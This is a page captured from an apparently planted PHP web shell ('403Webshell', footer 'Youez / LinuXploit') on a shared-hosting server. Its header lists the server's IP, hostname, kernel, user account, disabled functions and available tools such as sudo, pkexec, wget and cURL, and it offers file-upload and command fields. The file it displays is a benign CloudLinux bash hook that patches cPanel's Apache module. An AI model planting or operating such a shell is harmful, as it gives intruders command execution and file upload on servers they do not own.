403Webshell
Server IP : 104.21.17.213  /  Your IP : 216.73.217.141
Web Server : Apache
System : Linux hosting01.arsenalhost.com 4.18.0-425.13.1.lve.el8.x86_64 #1 SMP Mon Feb 27 15:23:24 EST 2023 x86_64
User : corbizre ( 1013)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/lve/modlscapi/hooks/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/lve/modlscapi/hooks/lsapi_patch_cpanel_hook.sh
#!/bin/bash
# Copyright (c) Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2026 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

LOG="/usr/share/lve/modlscapi/logs/lsapi_patch.log"
RES=$(cat "/usr/local/cpanel/Cpanel/WebServer/Supported/apache.pm" | grep "lsapi")

if [ -z "$RES" ]; then

    current_path=$(pwd)
    common_path_of_cpanel="/usr/share/lve/modlscapi/tars/"
    cd "$common_path_of_cpanel" || exit

    if [ -e "apache_pm.patch" ]; then

        cd /usr/local/cpanel/Cpanel/WebServer/Supported || exit
        patch -N -i $common_path_of_cpanel/apache_pm.patch

        if [ $? != 0 ]; then
            echo "$(date +%Y-%m-%d_%H:%M) - Error applying patch..." >> "$LOG"
            cd "$current_path" || exit
            exit 1
        else
            echo "$(date +%Y-%m-%d_%H:%M) - Patch was applied correctly..." >> "$LOG"
            cd "$current_path" || exit
            exit 0
        fi
    else
        echo "$(date +%Y-%m-%d_%H:%M) - Cannot find apache_pm.patch..." >> "$LOG"
        cd "$current_path" || exit
        exit 1
    fi
else
    echo "$(date +%Y-%m-%d_%H:%M) - Already patched..." >> "$LOG"
    exit 0
fi




Youez - 2016 - github.com/yon3zu
LinuXploit